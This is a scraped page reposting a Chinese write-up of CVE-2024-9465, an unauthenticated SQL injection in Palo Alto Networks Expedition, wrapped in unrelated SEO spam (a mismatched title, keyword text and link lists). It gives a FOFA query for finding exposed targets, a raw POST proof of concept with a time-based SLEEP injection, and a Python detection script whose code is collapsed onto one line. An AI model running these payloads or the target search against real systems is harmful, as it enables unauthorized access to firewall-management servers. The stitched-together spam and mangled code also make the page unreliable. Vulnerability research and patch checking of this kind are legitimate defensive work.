当前位置: 首页 > news >正文

怎么样做网站或产品推广人事管理系统

news 2025/9/17 3:56:29
怎么样做网站或产品推广,人事管理系统,太原网站制作电话,网页qq登录网站0x01 产品介绍: Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。 0x02 漏洞描述&am…

0x01 产品介绍:

        Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。

0x02 漏洞描述:

        该漏洞由于CHECKPOINT.php文件存在未授权访问。在sql校验逻辑中存在action=import当解析控制参数时会创建变量routename和id并且以字符串格式构造查询。导致了漏洞的产生

0x03 影响版本:

Palo Alto Networks Expedition < 1.2.96

0x04 搜索语句:

Fofa:title="Expedition Project"

0x05 漏洞复现:

poc

POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedaction=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test)

 

检测脚本:

脚本作者:https://github.com/horizon3ai/CVE-2024-9465

#!/usr/bin/python3
import argparse
import requests
import urllib3
import sys
import time
urllib3.disable_warnings()def create_checkpoint_table(url: str):print(f'[*] Creating Checkpoint database table...')data = {'action': 'get','type': 'existing_ruleBases','project': 'pandbRBAC',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)if r.status_code == 200 and 'ruleBasesNames' in r.text:print(f'[*] Successfully created the database table')returnprint(f'[-] Unexpected response creating table: {r.status_code}:{r.text}')sys.exit(1)def inject_checkpoint_query(url: str):start_time = time.time()print(f'[*] Injecting 10 second sleep payload into database query...')data = {'action': 'import','type': 'test','project': 'pandbRBAC','signatureid': '1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3)',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)execution_time = time.time() - start_timeif r.status_code == 200 and execution_time > 9 and execution_time < 15:print(f'[*] Successfully sent injection payload!')print(f'[+] Target is vulnerable, request took {execution_time} seconds')returnprint(f'[-] Unexpected response sending injection payload: {r.status_code}:{r.text}')sys.exit(1)if __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument('-u', '--url', help='The URL of the target', type=str, required=True)args = parser.parse_args()create_checkpoint_table(args.url)inject_checkpoint_query(args.url)

 

0x06 修复建议:

厂商已发布补丁 请即时升级

Expedition | Palo Alto Networks

http://www.yayakq.cn/news/460834/

相关文章:

  • 如何建设网址导航网站最近国际重大新闻
  • 网站视频解析西安企业注册
  • 中文网站编辑高端网络尊享服务
  • flash 网站带后台友情链接你会回来感谢我
  • 深圳做网站j华信科html5标准网站建设
  • 南昌网站建设公司咨询郑州便宜网站建设费用
  • 做兼职的网站有哪些网站 技术
  • 30个免费货源网站网络销售模式 自建网站
  • 海南网站制作多少钱网站代运营做哪些
  • asp.net mysql 网站开发基于asp.net网站开发
  • 做网站加入广告联盟做网站花钱么
  • 响应式网站 产品轮播代码百度seo排名在线点击器
  • 外贸网站设计公司软文新闻发稿平台
  • 教育类网站怎么做民宿行业网站建设方案
  • 做网站对商家的好处seo辅助
  • 个人做网站手机获取验证码wordpress 禁止转码
  • 怎么做网站报告软件技术是什么专业
  • 怎样与其它网站做友情链接亚马逊雨林简介
  • 石排网站仿做官方app下载
  • 定制 网站开发 价格公司简介模板英文版
  • 图书销售网站开发与实现厦门网站设计
  • 个域名的网站建设方案书net建站系统
  • 零售户电商网站订货网址wordpress 短信验证
  • 成都手机网站建设巩义企业网站托管服务商
  • 坑梓网站建设怎么样河南餐饮网站建设
  • 美食网站建设的背景和目的appstore美区免费
  • 游戏网站建设成功案例wordpress后台演示系统
  • 想建立什么网站吗网站开发 英文文章
  • 湛江企业网站seo大连网站开发
  • 网站章子怎么做wordpress 人力资源